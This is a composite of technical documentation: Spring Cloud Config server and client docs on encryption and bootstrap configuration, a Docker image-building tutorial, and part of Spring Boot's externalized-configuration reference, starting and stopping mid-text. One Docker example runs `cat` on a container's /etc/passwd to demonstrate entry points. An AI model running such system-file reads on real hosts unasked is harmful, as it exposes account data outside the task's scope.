the config files from the local classpath or file\nsystem (any static URL you want to point to with\n\"spring.cloud.config.server.native.locations\"). To use the native\nprofile just launch the Config Server with\n\"spring.profiles.active=native\". 
\n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a suffix on the search path, so properties files are\nloaded from each search location *and* a subdirectory with the same\nname as the label (the labelled properties take precedence in the\nSpring Environment).\n\n=== Security\n\nYou are free to secure your Config Server in any way that makes sense\nto you (from physical network security to OAuth2 bearer\ntokens), and Spring Security and Spring Boot make it easy to do pretty\nmuch anything. \n\nTo use the default Spring Boot configured HTTP Basic security, just\ninclude Spring Security on the classpath (e.g. through\n`spring-boot-starter-security`). The default is a username of \"user\"\nand a randomly generated password, which isn't going to be very useful\nin practice, so we recommend you configure the password (via\n`security.user.password`) and encrypt it (see below for instructions\non how to do that).\n\n=== Encryption and Decryption\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\nThe server exposes `\/encrypt` and `\/decrypt` endpoints (on the\nassumption that these will be secured and only accessed by authorized\nagents). If the remote property sources contain encryted content\n(values starting with `{cipher}`) they will be decrypted before\nsending to clients over HTTP. The main advantage of this set up is\nthat the property values don't have to be in plain text when they are\n\"at rest\" (e.g. in a git repository). If a value cannot be decrypted\nit is replaced with an empty string, largely to prevent cipher text\nbeing used as a password in Spring Boot autconfigured HTTP basic.\n\nIf you are setting up a remote config repository for config client\napplications it might contain an `application.yml` like this, for\ninstance:\n\n.application.yml\n----\nspring:\n datasource:\n username: dbuser\n password: {cipher}FKSAJDFGYOS8F7GLHAKERGFHLSAJ\n----\n\nYou can safely push this plain text to a shared git repository and the\nsecret password is protected.\n\nIf you are editing a remote config file you can use the Config Server\nto encrypt values by POSTing to the `\/encrypt` endpoint, e.g.\n\n----\n$ curl localhost:8888\/encrypt -d mysecret\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n----\n\nThe inverse operation is also available via `\/decrypt` (provided the server is\nconfigured with a symmetric key or a full key pair):\n\n----\n$ curl localhost:8888\/decrypt -d 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTake the encypted value and add the `{cipher}` prefix before you put\nit in the YAML or properties file, and before you commit and push it\nto a remote, potentially insecure store.\n\nThe `spring` command line client (with Spring Cloud CLI extensions\ninstalled) can also be used to encrypt and decrypt, e.g.\n\n----\n$ spring encrypt mysecret --key foo\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n$ spring decrypt --key foo 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTo use a key in a file (e.g. 
an RSA public key for encryption) prepend
the key value with "@" and provide the file path, e.g.

----
$ spring encrypt mysecret --key @${HOME}/.ssh/id_rsa.pub
AQAjPgt3eFZQXwt8tsHAVv/QHiY5sI2dRcR+...
----

=== Key Management

The Config Server can use a symmetric (shared) key or an asymmetric
one (RSA key pair). The asymmetric choice is superior in terms of
security, but it is often more convenient to use a symmetric key since
it is just a single property value to configure.

To configure a symmetric key you just need to set `encrypt.key` to a
secret String (or use an environment variable `ENCRYPT_KEY` to keep it
out of plain text configuration files). You can also POST a key value
to the `/key` endpoint (but that won't change any existing encrypted
values in remote repositories).

To configure an asymmetric key you can either set the key as a
PEM-encoded text value (in `encrypt.key`), or via a keystore (e.g. as
created by the `keytool` utility that comes with the JDK). The
keystore properties are `encrypt.keyStore.\*` with `*` equal to

* `location` (a `Resource` location),
* `password` (to unlock the keystore) and
* `alias` (to identify which key in the store is to be used).

The encryption is done with the public key, and a private key is
needed for decryption. Thus in principle you can configure only the
public key in the server if you only want to do encryption (and are
prepared to decrypt the values yourself locally with the private
key). In practice you might not want to do that because it spreads the
key management process around all the clients, instead of
concentrating it in the server. On the other hand it's a useful option
if your config server really is relatively insecure and only a
handful of clients need the encrypted properties.

=== Creating a Key Store for Testing

To create a keystore for testing you can do something like this:

----
$ keytool -genkeypair -alias mytestkey -keyalg RSA \
  -dname "CN=Web Server,OU=Unit,O=Organization,L=City,S=State,C=US" \
  -keypass changeme -keystore server.jks -storepass letmein
----

Put the `server.jks` file in the classpath (for instance) and then in
your `application.yml` for the Config Server:

----
encrypt:
  keyStore:
    location: classpath:/server.jks
    alias: mytestkey
    password: letmein
----

=== Embedding the Config Server

The Config Server runs best as a standalone application, but if you
need to you can embed it in another application. Just use the
`@EnableConfigServer` annotation and (optionally) set
`spring.cloud.config.server.prefix` to a path prefix, e.g. "/config",
to serve the resources under a prefix. The prefix should start but not
end with a "/". It is applied to the `@RequestMappings` in the Config
Server (i.e. underneath the Spring Boot prefixes `server.servletPath`
and `server.contextPath`).
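
For example, a minimal embedded Config Server might look like the
following sketch (the class name is illustrative):

[source,java]
----
@Configuration
@EnableAutoConfiguration
@EnableConfigServer
public class ConfigServerApplication {

	public static void main(String[] args) {
		SpringApplication.run(ConfigServerApplication.class, args);
	}

}
----

Run it like any other Spring Boot application and the Config Server
resources are served alongside your own endpoints.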
== Spring Cloud Config Client

A Spring Boot application can take immediate advantage of the Spring
Config Server (or other external property sources provided by the
application developer), and it will also pick up some additional
useful features related to `Environment` change events.

[[config-first-bootstrap]]
=== Config First Bootstrap

This is the default behaviour for any application which has the Spring
Cloud Config Client on the classpath. When a config client starts up
it binds to the Config Server (via the bootstrap configuration
property `spring.cloud.config.uri`) and initializes the Spring
`Environment` with remote property sources.

The net result of this is that all client apps that want to consume
the Config Server need a `bootstrap.yml` (or an environment variable)
with the server address in `spring.cloud.config.uri` (defaults to
"http://localhost:8888").

[[eureka-first-bootstrap]]
=== Eureka First Bootstrap

If you are using Spring Cloud Netflix and Eureka Service Discovery,
then you can have the Config Server register with Eureka if you want
to, but in the default "Config First" mode, clients won't be able to
take advantage of the registration.

If you prefer to use Eureka to locate the Config Server, you can do
that by setting `spring.cloud.config.discovery.enabled=true` (default
"false"). The net result of that is that client apps all need a
`bootstrap.yml` (or an environment variable) with the Eureka server
address, e.g. in `eureka.client.serviceUrl.defaultZone`. The price
for using this option is an extra network round trip on start up to
locate the service registration. The benefit is that the Config Server
can change its co-ordinates, as long as Eureka is a fixed point.

[[config-client-fail-fast]]
=== Config Client Fail Fast

In some cases, it may be desirable to fail startup of a service if
it cannot connect to the Config Server. If this is the desired
behavior, set the bootstrap configuration property
`spring.cloud.config.failFast=true` and the client will halt with
an exception.

=== Environment Changes

The application will listen for an `EnvironmentChangeEvent` and react
to the change in a couple of standard ways (additional
`ApplicationListeners` can be added as `@Beans` by the user in the
normal way; a sketch follows the list below). When an
`EnvironmentChangeEvent` is observed it will have a list of the keys
whose values have changed, and the application will use those to:

* Re-bind any `@ConfigurationProperties` beans in the context
* Set the logger levels for any properties in `logging.level.*`
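
For example, a listener contributed as a bean might look like the
following sketch (the class name is illustrative, and the event type
is `org.springframework.cloud.context.environment.EnvironmentChangeEvent`):

[source,java]
----
@Component
public class ChangeLoggingListener implements ApplicationListener<EnvironmentChangeEvent> {

	@Override
	public void onApplicationEvent(EnvironmentChangeEvent event) {
		// getKeys() reports the names of the properties whose values changed
		System.out.println("Configuration changed: " + event.getKeys());
	}

}
----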
Note that the Config Client does not by default poll for changes in
the `Environment`, and generally we would not recommend that approach
for detecting changes (although you could set it up with a
`@Scheduled` annotation). If you have a scaled-out client application
then it is better to broadcast the `EnvironmentChangeEvent` to all
the instances instead of having them poll for changes (e.g. using
the https://github.com/spring-cloud/spring-cloud-bus[Spring Cloud
Bus]).

The `EnvironmentChangeEvent` covers a large class of refresh use
cases, as long as you can actually make a change to the `Environment`
and publish the event (those APIs are public and part of core
Spring). You can verify the changes are bound to
`@ConfigurationProperties` beans by visiting the `/configprops`
endpoint (a normal Spring Boot Actuator feature). For instance a
`DataSource` can have its `maxPoolSize` changed at runtime (the
default `DataSource` created by Spring Boot is an
`@ConfigurationProperties` bean) and grow capacity
dynamically. Re-binding `@ConfigurationProperties` does not cover
another large class of use cases, where you need more control over the
refresh, and where you need a change to be atomic over the whole
`ApplicationContext`. To address those concerns we have
`@RefreshScope`.

=== Refresh Scope

A Spring `@Bean` that is marked as `@RefreshScope` will get special
treatment when there is a configuration change. This addresses the
problem of stateful beans that only get their configuration injected
when they are initialized. For instance if a `DataSource` has open
connections when the database URL is changed via the `Environment`, we
probably want the holders of those connections to be able to complete
what they are doing. Then the next time someone borrows a connection
from the pool they get one with the new URL.

Refresh scope beans are lazy proxies that initialize when they are
used (i.e. when a method is called), and the scope acts as a cache of
initialized values. To force a bean to re-initialize on the next
method call you just need to invalidate its cache entry.

The `RefreshScope` is a bean in the context and it has a public method
`refreshAll()` to refresh all beans in the scope by clearing the
target cache. There is also a `refresh(String)` method to refresh an
individual bean by name. This functionality is exposed in the
`/refresh` endpoint (over HTTP or JMX).

NOTE: `@RefreshScope` works (technically) on an `@Configuration`
class, but it might lead to surprising behaviour: e.g. it does *not*
mean that all the `@Beans` defined in that class are themselves
`@RefreshScope`. Specifically, anything that depends on those beans
cannot rely on them being updated when a refresh is initiated, unless
it is itself in `@RefreshScope` (in which case it will be rebuilt on a
refresh and its dependencies re-injected, at which point they will be
re-initialized from the refreshed `@Configuration`).

=== Encryption and Decryption

The Config Client has an `Environment` pre-processor for decrypting
property values locally. It follows the same rules as the Config
Server, and has the same external configuration via `encrypt.\*`. Thus
you can use encrypted values in the form `{cipher}*` and as long as
there is a valid key then they will be decrypted before the main
application context gets the `Environment`.

=== Endpoints

For a Spring Boot Actuator application there are some additional management endpoints:

* POST to `/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels
* `/refresh` for re-loading the bootstrap context and refreshing the `@RefreshScope` beans
* `/restart` for closing the `ApplicationContext` and restarting it (disabled by default)
* `/pause` and `/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`)

=== Locating Remote Configuration Resources

The Config Service serves property sources from `/{name}/{env}/{label}`, where the default bindings in the
client app are

* "name" = `${spring.application.name}`
* "env" = `${spring.profiles.active}` (actually `Environment.getActiveProfiles()`)
* "label" = "master"

All of them can be overridden by setting `spring.cloud.config.\*`
(where `*` is "name", "env" or "label"). The "label" is useful for
rolling back to previous versions of configuration; with the default
Config Server implementation it can be a git label, branch name or
commit id.

=== The Bootstrap Application Context

The Config Client operates by creating a "bootstrap" application
context, which is a parent context for the main application.
Out of
the box it is responsible for loading configuration properties from
the Config Server, and also decrypting properties in the local
external configuration files. The two contexts share an `Environment`,
which is the source of external properties for any Spring
application. Bootstrap properties are added with high precedence, so
they cannot be overridden by local configuration.

The bootstrap context uses a different convention for locating
external configuration than the main application context, so instead
of `application.yml` (or `.properties`) you use `bootstrap.yml`,
keeping the external configuration for bootstrap and main context
nicely separate. Example:

.bootstrap.yml
----
spring:
  application:
    name: foo
  cloud:
    config:
      uri: ${SPRING_CONFIG_URI:http://localhost:8888}
----

It is a good idea to set the `spring.application.name` (in
`bootstrap.yml` or `application.yml`) if your application needs any
application-specific configuration from the server.

You can disable the bootstrap process completely by setting
`spring.cloud.bootstrap.enabled=false` (e.g. in System properties).

=== Application Context Hierarchies

If you build an application context from `SpringApplication` or
`SpringApplicationBuilder`, then the Bootstrap context is added as a
parent to that context. It is a feature of Spring that child contexts
inherit property sources and profiles from their parent, so the "main"
application context will contain additional property sources, compared
to building the same context without Spring Cloud Config. The
additional property sources are:

* "bootstrap": an optional `CompositePropertySource` appears with high
priority if any `PropertySourceLocators` are found in the Bootstrap
context, and they have non-empty properties. An example would be
properties from the Spring Cloud Config Server. See
link:#customizing-bootstrap-property-sources[below] for instructions
on how to customize the contents of this property source.

* "applicationConfig: [classpath:bootstrap.yml]" (and friends if
Spring profiles are active). If you have a `bootstrap.yml` (or
properties) then those properties are used to configure the Bootstrap
context, and then they get added to the child context when its parent
is set. They have lower precedence than the `application.yml` (or
properties) and any other property sources that are added to the child
as a normal part of the process of creating a Spring Boot
application. See link:#customizing-bootstrap-properties[below] for
instructions on how to customize the contents of these property
sources.

Because of the ordering rules of property sources the "bootstrap"
entries take precedence, but note that these do not contain any data
from `bootstrap.yml`, which has very low precedence, but can be used
to set defaults.

You can extend the context hierarchy by simply setting the parent
context of any `ApplicationContext` you create, e.g. using its own
interface, or with the `SpringApplicationBuilder` convenience methods
(`parent()`, `child()` and `sibling()`). The bootstrap context will be
the parent of the most senior ancestor that you create yourself.
Every context in the hierarchy will have its own "bootstrap" property
source (possibly empty) to avoid promoting values inadvertently from
parents down to their descendants. Every context in the hierarchy can
also (in principle) have a different `spring.application.name` and
hence a different remote property source if there is a Config
Server. Normal Spring application context behaviour rules apply to
property resolution: properties from a child context override those in
the parent, by name and also by property source name (if the child has
a property source with the same name as the parent, the one from the
parent is not included in the child).
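
For example, a parent-child pair could be built like the following
sketch (`Parent` and `Child` stand for your own `@Configuration`
classes):

[source,java]
----
// the bootstrap context becomes the parent of the most senior context (Parent)
new SpringApplicationBuilder(Parent.class)
		.child(Child.class)
		.run(args);
----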
Note that the `SpringApplicationBuilder` allows you to share an
`Environment` amongst the whole hierarchy, but that is not the
default. Thus, sibling contexts in particular do not need to have the
same profiles or property sources, even though they will share common
things with their parent.

[[customizing-bootstrap-properties]]
=== Changing the Location of Bootstrap Properties

The `bootstrap.yml` (or `.properties`) location can be specified using
`spring.cloud.bootstrap.name` (default "bootstrap") or
`spring.cloud.bootstrap.location` (default empty), e.g. in System
properties. Those properties behave like the `spring.config.*`
variants with the same name, in fact they are used to set up the
bootstrap `ApplicationContext` by setting those properties in its
`Environment`. If there is an active profile (from
`spring.profiles.active` or through the `Environment` API in the
context you are building) then properties in that profile will be
loaded as well, just like in a regular Spring Boot app, e.g. from
`bootstrap-development.properties` for a "development" profile.

=== Customizing the Bootstrap Configuration

The bootstrap context can be trained to do anything you like by adding
entries to `/META-INF/spring.factories` under the key
`org.springframework.cloud.bootstrap.BootstrapConfiguration`. This is
a comma-separated list of Spring `@Configuration` classes which will
be used to create the context. Any beans that you want to be available
to the main application context for autowiring can be created here,
and also there is a special contract for `@Beans` of type
`ApplicationContextInitializer`.

The bootstrap process ends by injecting initializers into the main
`SpringApplication` instance (i.e. the normal Spring Boot startup
sequence, whether it is running as a standalone app or deployed in an
application server). First a bootstrap context is created from the
classes found in `spring.factories` and then all `@Beans` of type
`ApplicationContextInitializer` are added to the main
`SpringApplication` before it is started.

[[customizing-bootstrap-property-sources]]
=== Customizing the Bootstrap Property Sources

The default property source for external configuration added by the
bootstrap process is the Config Server, but you can add additional
sources by adding beans of type `PropertySourceLocator` to the
bootstrap context (via `spring.factories`).
You could use this to
insert additional properties from a different server, or from a
database, for instance.

As an example, consider the following trivial custom locator:

[source,java]
----
@Configuration
public class CustomPropertySourceLocator implements PropertySourceLocator {

    @Override
    public PropertySource<?> locate(Environment environment) {
        return new MapPropertySource("customProperty",
                Collections.<String, Object>singletonMap("property.from.sample.custom.source", "worked as intended"));
    }

}
----

The `Environment` that is passed in is the one for the
`ApplicationContext` about to be created, i.e. the one that we are
supplying additional property sources for. It will already have its
normal Spring Boot-provided property sources, so you can use those to
locate a property source specific to this `Environment` (e.g. by
keying it on the `spring.application.name`, as is done in the default
Config Server property source locator).

If you create a jar with this class in it and then add a
`META-INF/spring.factories` containing:

----
org.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator
----

then the "customProperty" `PropertySource` will show up in any
application that includes that jar on its classpath.

=== Security

If you use HTTP Basic security on the server then clients just need to
know the password (and username if it isn't the default). You can do
that via the config server URI, or via separate username and password
properties, e.g.

.bootstrap.yml
----
spring:
  cloud:
    config:
      uri: https://user:secret@myconfig.mycompany.com
----

or

.bootstrap.yml
----
spring:
  cloud:
    config:
      uri: https://myconfig.mycompany.com
      username: user
      password: secret
----

The `spring.cloud.config.password` and `spring.cloud.config.username`
values override anything that is provided in the URI.

If you deploy your apps on Cloud Foundry then the best way to provide
the password is through service credentials, e.g. in the URI, since
then it doesn't even need to be in a config file. An example which
works locally and for a user-provided service on Cloud Foundry named
"configserver":

.bootstrap.yml
----
spring:
  cloud:
    config:
      uri: ${vcap.services.configserver.credentials.uri:http://user:password@localhost:8888}
----

If you use another form of security you might need to provide a
`RestTemplate` to the `ConfigServicePropertySourceLocator` (e.g. by
grabbing it in the bootstrap context and injecting one).
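
One possible approach (a sketch, not the only way) is to declare the
locator yourself in a `@Configuration` class registered as a
`BootstrapConfiguration` in `spring.factories` (as described above),
and hand it a customized `RestTemplate`; the class name and the
customization are illustrative:

[source,java]
----
@Configuration
public class CustomConfigBootstrapConfiguration {

	@Bean
	public ConfigServicePropertySourceLocator configServicePropertySourceLocator(
			ConfigClientProperties clientProperties) {
		ConfigServicePropertySourceLocator locator =
				new ConfigServicePropertySourceLocator(clientProperties);
		locator.setRestTemplate(secureRestTemplate());
		return locator;
	}

	private RestTemplate secureRestTemplate() {
		RestTemplate template = new RestTemplate();
		// customize the template here, e.g. add interceptors that attach credentials
		return template;
	}

}
----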
== Docker Image

*PURPOSE*: This chapter explains how to create a Docker image.

As explained in <<Docker_Basics>>, a Docker image is the *build component* of Docker and a read-only template of the application operating system.

=== Dockerfile

Docker builds images by reading instructions from a _Dockerfile_. A _Dockerfile_ is a text document that contains all the commands a user could call on the command line to assemble an image. The `docker build` command uses this file and executes all the commands in succession to create an image.

The `build` command is also passed a context that is used during image creation. This context can be a path on your local filesystem or a URL to a Git repository.

The file is usually called _Dockerfile_. The complete list of commands that can be specified in this file is explained at https://docs.docker.com/reference/builder/. The common commands are listed below:

.Common commands for Dockerfile
[width="100%", options="header", cols="1,4,4"]
|==================
| Command | Purpose | Example
| FROM | First non-comment instruction in _Dockerfile_ | `FROM ubuntu`
| COPY | Copies multiple source files from the context to the file system of the container at the specified path | `COPY .bash_profile /home`
| ENV | Sets the environment variable | `ENV HOSTNAME=test`
| RUN | Executes a command | `RUN apt-get update`
| CMD | Defaults for an executing container | `CMD ["/bin/echo", "hello world"]`
| EXPOSE | Informs the network ports that the container will listen on | `EXPOSE 8093`
|==================

=== Create your first Docker image

. Create a new directory.
. Create a new text file, name it _Dockerfile_, and use the following contents:
+
[source, text]
----
FROM ubuntu

CMD ["/bin/echo", "hello world"]
----
+
This image uses `ubuntu` as the base image. The `CMD` command defines the command that needs to run. It provides a different entry point of `/bin/echo` and gives the argument "`hello world`".
+
. Build this image:
+
```console
> docker build -t helloworld .
Sending build context to Docker daemon 2.048 kB
Step 0 : FROM ubuntu
Pulling repository docker.io/library/ubuntu
a5a467fddcb8: Download complete 
3fd0c2ae8ed2: Download complete 
9e19ac89d27c: Download complete 
ac65c371c3a5: Download complete 
Status: Downloaded newer image for ubuntu:latest
 ---> a5a467fddcb8
Step 1 : CMD /bin/echo hello world
 ---> Running in 132bb0bf823f
 ---> e81a394f71e3
Removing intermediate container 132bb0bf823f
Successfully built e81a394f71e3
```
+
`.` in this command is the context for `docker build`.
+
. List the images available:
+
```console
> docker images
REPOSITORY    TAG       IMAGE ID       CREATED          VIRTUAL SIZE
helloworld    latest    9c0e7b56cbee   13 minutes ago   187.9 MB
```
+
. Run the container:
+
 docker run -it helloworld
+
to see the output:
+
 hello world
+
. Change the base image from `ubuntu` to `busybox` in `Dockerfile`. Build the image again:
+
 docker build -t helloworld2 .
+
and view the images as:
+
```console
> docker images
REPOSITORY     TAG       IMAGE ID       CREATED          VIRTUAL SIZE
helloworld     latest    e81a394f71e3   26 minutes ago   187.9 MB
helloworld2    latest    c458787fadcf   3 seconds ago    1.113 MB
ubuntu         latest    a5a467fddcb8   2 days ago       187.9 MB
busybox        latest    3d5bcd78e074   4 days ago       1.113 MB
```

=== WildFly Image

. Create a new directory.
. Create a new text file, name it _Dockerfile_, and use the following contents:
+
[source, text]
----
FROM jboss/wildfly
----
+
. Build the image:
+
 docker build -t mywildfly .
+
. Run the container:
+
 docker run -it mywildfly
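
When you run a server image like this you will usually also want to publish its HTTP port so that the application is reachable from the host. A sketch, assuming WildFly's default HTTP port of 8080:

 docker run -it -p 8080:8080 mywildfly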
=== Java EE 7 Application Image

. Create a new directory.
. Create a new text file, name it _Dockerfile_, and use the following contents:
+
[source, text]
----
FROM jboss/wildfly <1>

CMD ["/opt/jboss/wildfly/bin/standalone.sh", "-c", "standalone-full.xml", "-b", "0.0.0.0"] <2>

RUN curl -L https://github.com/javaee-samples/javaee7-hol/raw/master/solution/movieplex7-1.0-SNAPSHOT.war -o /opt/jboss/wildfly/standalone/deployments/movieplex7-1.0-SNAPSHOT.war <3>
----
+
Three things happen in this image:
+
<1> Uses "`jboss/wildfly`" as the base image
<2> Starts WildFly application server in Full Platform mode
<3> Copies the WAR file from a URL to the deployment directory of WildFly
+
. Build the image:

 docker build -t movieplex .

=== Dockerfile Command Design Patterns

==== Difference between CMD and ENTRYPOINT

*TL;DR* `CMD` will work for most of the cases.

The default entry point for a container is `/bin/sh`, the default shell.

Running a container as `docker run -it ubuntu` uses that command and starts the default shell. The output is shown as:

```console
> docker run -it ubuntu
root@88976ddee107:/#
```

`ENTRYPOINT` allows you to override the entry point to some other command, and even customize it. For example, a container can be started as:

```console
> docker run -it --entrypoint=/bin/cat ubuntu /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
. . .
```

This command overrides the entry point to the container to `/bin/cat`. The argument(s) passed to the CLI are used by the entry point.

==== Difference between ADD and COPY

*TL;DR* `COPY` will work for most of the cases.

`ADD` has all the capabilities of `COPY` and has the following additional features:

. Allows tar file auto-extraction in the image, for example, `ADD app.tar.gz /opt/var/myapp`.
. Allows files to be downloaded from a remote URL. However, the downloaded files will become part of the image. This causes the image size to bloat. So it's recommended to use `curl` or `wget` to download the archive explicitly, extract it, and remove the archive.

==== Import and export images

Docker images can be saved using the `save` command to a .tar file:

 docker save helloworld > helloworld.tar

These tar files can then be imported using the `load` command:

 docker load -i helloworld.tar
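
Together, `save` and `load` give you a registry-free way to move an image between hosts. A sketch (the remote host name is hypothetical):

 docker save helloworld > helloworld.tar
 scp helloworld.tar user@otherhost:
 ssh user@otherhost docker load -i helloworld.tar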
[[features.external-config]]
== Externalized Configuration
Spring Boot lets you externalize your configuration so that you can work with the same application code in different environments.
You can use a variety of external configuration sources, including Java properties files, YAML files, environment variables, and command-line arguments.

Property values can be injected directly into your beans by using the `@Value` annotation, accessed through Spring's `Environment` abstraction, or be <<features#features.external-config.typesafe-configuration-properties,bound to structured objects>> through `@ConfigurationProperties`.

Spring Boot uses a very particular `PropertySource` order that is designed to allow sensible overriding of values.
Properties are considered in the following order (with values from lower items overriding earlier ones):

. Default properties (specified by setting `SpringApplication.setDefaultProperties`).
. {spring-framework-api}/context/annotation/PropertySource.html[`@PropertySource`] annotations on your `@Configuration` classes.
  Please note that such property sources are not added to the `Environment` until the application context is being refreshed.
  This is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.
. Config data (such as `application.properties` files).
. A `RandomValuePropertySource` that has properties only in `+random.*+`.
. OS environment variables.
. Java System properties (`System.getProperties()`).
. JNDI attributes from `java:comp/env`.
. `ServletContext` init parameters.
. `ServletConfig` init parameters.
. Properties from `SPRING_APPLICATION_JSON` (inline JSON embedded in an environment variable or system property).
. Command line arguments.
. 
`properties` attribute on your tests.\n Available on {spring-boot-test-module-api}\/context\/SpringBootTest.html[`@SpringBootTest`] and the <<features#features.testing.spring-boot-applications.autoconfigured-tests,test annotations for testing a particular slice of your application>>.\n. {spring-framework-api}\/test\/context\/TestPropertySource.html[`@TestPropertySource`] annotations on your tests.\n. <<using#using.devtools.globalsettings,Devtools global settings properties>> in the `$HOME\/.config\/spring-boot` directory when devtools is active.\n\nConfig data files are considered in the following order:\n\n. <<features#features.external-config.files,Application properties>> packaged inside your jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> packaged inside your jar (`application-\\{profile}.properties` and YAML variants).\n. <<features#features.external-config.files,Application properties>> outside of your packaged jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> outside of your packaged jar (`application-\\{profile}.properties` and YAML variants).\n\nNOTE: It is recommended to stick with one format for your entire application.\nIf you have configuration files with both `.properties` and `.yml` format in the same location, `.properties` takes precedence.\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a `name` property, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/MyBean.java[]\n----\n\nOn your application classpath (for example, inside your jar) you can have an `application.properties` file that provides a sensible default property value for `name`.\nWhen running in a new environment, an `application.properties` file can be provided outside of your jar that overrides the `name`.\nFor one-off testing, you can launch with a specific command line switch (for example, `java -jar app.jar --name=\"Spring\"`).\n\nTIP: The `env` and `configprops` endpoints can be useful in determining why a property has a particular value.\nYou can use these two endpoints to diagnose unexpected property values.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.command-line-args]]\n=== Accessing Command Line Properties\nBy default, `SpringApplication` converts any command line option arguments (that is, arguments starting with `--`, such as `--server.port=9000`) to a `property` and adds them to the Spring `Environment`.\nAs mentioned previously, command line properties always take precedence over file-based property sources.\n\nIf you do not want command line properties to be added to the `Environment`, you can disable them by using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[features.external-config.application-json]]\n=== JSON Application Properties\nEnvironment variables and system properties often have restrictions that mean some property names cannot be used.\nTo help with this, Spring Boot allows you to encode a block of properties into a single JSON structure.\n\nWhen your application starts, any `spring.application.json` or `SPRING_APPLICATION_JSON` properties will be parsed and added to the `Environment`.\n\nFor example, the `SPRING_APPLICATION_JSON` property can be supplied on the 
command line in a UN{asterisk}X shell as an environment variable:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ SPRING_APPLICATION_JSON='{\"my\":{\"name\":\"test\"}}' java -jar myapp.jar\n----\n\nIn the preceding example, you end up with `my.name=test` in the Spring `Environment`.\n\nThe same JSON can also be provided as a system property:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -Dspring.application.json='{\"my\":{\"name\":\"test\"}}' -jar myapp.jar\n----\n\nOr you could supply the JSON by using a command line argument:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myapp.jar --spring.application.json='{\"my\":{\"name\":\"test\"}}'\n----\n\nIf you are deploying to a classic Application Server, you could also use a JNDI variable named `java:comp\/env\/spring.application.json`.\n\nNOTE: Although `null` values from the JSON will be added to the resulting property source, the `PropertySourcesPropertyResolver` treats `null` properties as missing values.\nThis means that the JSON cannot override properties from lower order property sources with a `null` value.\n\n\n\n[[features.external-config.files]]\n=== External Application Properties [[features.external-config.files]]\nSpring Boot will automatically find and load `application.properties` and `application.yaml` files from the following locations when your application starts:\n\n. From the classpath\n.. The classpath root\n.. The classpath `\/config` package\n. From the current directory\n.. The current directory\n.. The `\/config` subdirectory in the current directory\n.. Immediate child directories of the `\/config` subdirectory\n\nThe list is ordered by precedence (with values from lower items overriding earlier ones).\nDocuments from the loaded files are added as `PropertySources` to the Spring `Environment`.\n\nIf you do not like `application` as the configuration file name, you can switch to another file name by specifying a configprop:spring.config.name[] environment property.\nFor example, to look for `myproject.properties` and `myproject.yaml` files you can run your application as follows:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nYou can also refer to an explicit location by using the configprop:spring.config.location[] environment property.\nThis property accepts a comma-separated list of one or more locations to check.\n\nThe following example shows how to specify two distinct files:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.location=\\\n\t\toptional:classpath:\/default.properties,\\\n\t\toptional:classpath:\/override.properties\n----\n\nTIP: Use the prefix `optional:` if the <<features#features.external-config.files.optional-prefix,locations are optional>> and you do not mind if they do not exist.\n\nWARNING: `spring.config.name`, `spring.config.location`, and `spring.config.additional-location` are used very early to determine which files have to be loaded.\nThey must be defined as an environment property (typically an OS environment variable, a system property, or a command-line argument).\n\nIf `spring.config.location` contains directories (as opposed to files), they should end in `\/`.\nAt runtime they will be appended with the names generated from `spring.config.name` before being loaded.\nFiles specified in `spring.config.location` are imported directly.\n\nNOTE: Both directory and file location values are also expanded to check for 
<<features#features.external-config.files.profile-specific,profile-specific files>>.\nFor example, if you have a `spring.config.location` of `classpath:myconfig.properties`, you will also find appropriate `classpath:myconfig-<profile>.properties` files are loaded.\n\nIn most situations, each configprop:spring.config.location[] item you add will reference a single file or directory.\nLocations are processed in the order that they are defined and later ones can override the values of earlier ones.\n\n[[features.external-config.files.location-groups]]\nIf you have a complex location setup, and you use profile-specific configuration files, you may need to provide further hints so that Spring Boot knows how they should be grouped.\nA location group is a collection of locations that are all considered at the same level.\nFor example, you might want to group all classpath locations, then all external locations.\nItems within a location group should be separated with `;`.\nSee the example in the \"`<<features#features.external-config.files.profile-specific>>`\" section for more details.\n\nLocations configured by using `spring.config.location` replace the default locations.\nFor example, if `spring.config.location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nIf you prefer to add additional locations, rather than replacing them, you can use `spring.config.additional-location`.\nProperties loaded from additional locations can override those in the default locations.\nFor example, if `spring.config.additional-location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. 